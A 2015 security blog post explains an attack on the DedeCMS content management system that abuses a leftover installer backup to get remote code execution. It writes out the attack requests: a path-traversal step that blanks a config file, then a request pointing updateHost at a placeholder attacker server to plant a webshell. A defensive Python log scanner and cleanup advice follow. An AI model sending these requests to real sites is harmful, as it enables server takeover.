Saw this attack below that appears to be targeted at DedeCMS, a popular Chinese CMS.

HEAD /install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php

It appears that if this vulnerable page (a leftover backup copy of the installer) is still present, exposed, and unpatched, the attacker can gain remote code execution, per a blog post I read.

Above is step 1 in the process. The install_demo_name parameter is a path traversal (../data/admin/config_update.php), so the installer writes an empty file over config_update.php. That file is where the CMS installer defines its update host, so once it is blank the guards are down on the site: the next request can supply the update host itself. Note that the attacker uses HEAD here; the PHP still runs, they just don't care about the response body.

Then the 2nd step: the attacker stands up an HTTP service on a box they control and sends a similar request, this time pointing updateHost at it:

GET /install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=hello.php&updateHost=http://BADGUYIP:BADGUYPORT/

The installer fetches its "demo data" from that host and saves it as install/hello.php, so the webshell now lives here:

GET /install/hello.php

and your site is owned.
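If you want to hunt for this in your own web logs, here is an added example (my code, not from the blog post or from DedeCMS) that scans Combined Log Format lines for the three requests above and reports which client IPs sent the full chain rather than a lone scanner probe. The sample log lines are constructed for the example; the IPs, timestamps and the hello.php name are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (Combined Log Format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Mar/2015:10:01:02 +0000] "HEAD /install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php HTTP/1.1" 200 -
203.0.113.5 - - [12/Mar/2015:10:01:03 +0000] "GET /install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=hello.php&updateHost=http://BADGUYIP:BADGUYPORT/ HTTP/1.1" 200 512
203.0.113.5 - - [12/Mar/2015:10:01:04 +0000] "GET /install/hello.php HTTP/1.1" 200 37
198.51.100.9 - - [12/Mar/2015:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 8192
198.51.100.9 - - [12/Mar/2015:10:02:05 +0000] "GET /install/index.php.bak?step=1 HTTP/1.1" 404 0
"""

# ip ident user [timestamp] "METHOD target protocol" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

STAGE1 = "stage1_config_truncate"
STAGE2 = "stage2_remote_write"


def classify(target):
    """Label one request target, or return None if it is not part of this attack chain."""
    parts = urlsplit(target)
    path, qs = parts.path, parse_qs(parts.query)
    if path.endswith("/install/index.php.bak"):
        if qs.get("step") == ["11"]:
            demo = qs.get("install_demo_name", [""])[0]
            # Stage 1: install_demo_name traverses out of install/ to overwrite a config file.
            if ".." in demo or "/" in demo:
                return STAGE1
            # Stage 2: attacker-supplied update host, file lands in install/.
            if "updateHost" in qs:
                return STAGE2
        # Any hit on the backup installer is worth knowing about; it should not exist.
        return "installer_bak_probe"
    # A .php under install/ other than the installer itself is a likely dropped webshell.
    if path.startswith("/install/") and path.endswith(".php") and path != "/install/index.php":
        return "possible_webshell_access"
    return None


def scan(log_text):
    """Return one finding dict per suspicious request, in log order."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify(m["target"])
        if label:
            findings.append({
                "ip": m["ip"], "ts": m["ts"], "method": m["method"],
                "status": int(m["status"]), "label": label,
            })
    return findings


def attack_chains(findings):
    """IPs that sent both stage 1 and stage 2: a real attempt, not just a scanner probe."""
    by_ip = {}
    for f in findings:
        by_ip.setdefault(f["ip"], set()).add(f["label"])
    return sorted(ip for ip, labels in by_ip.items() if {STAGE1, STAGE2} <= labels)


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(f'{h["ts"]} {h["ip"]} {h["method"]} {h["status"]} {h["label"]}')
    print("full chain from:", attack_chains(SAMPLE_LOG and hits))
```

Two things to keep in mind when reading the output: a 200 on the stage 1 or stage 2 request means the .bak file really was there and the PHP ran (HEAD included), whereas a 404 on a probe just means somebody is looking. Either way, the fix is the same: delete the install/ directory after setup, and check data/admin/config_update.php has not been zeroed.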
Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.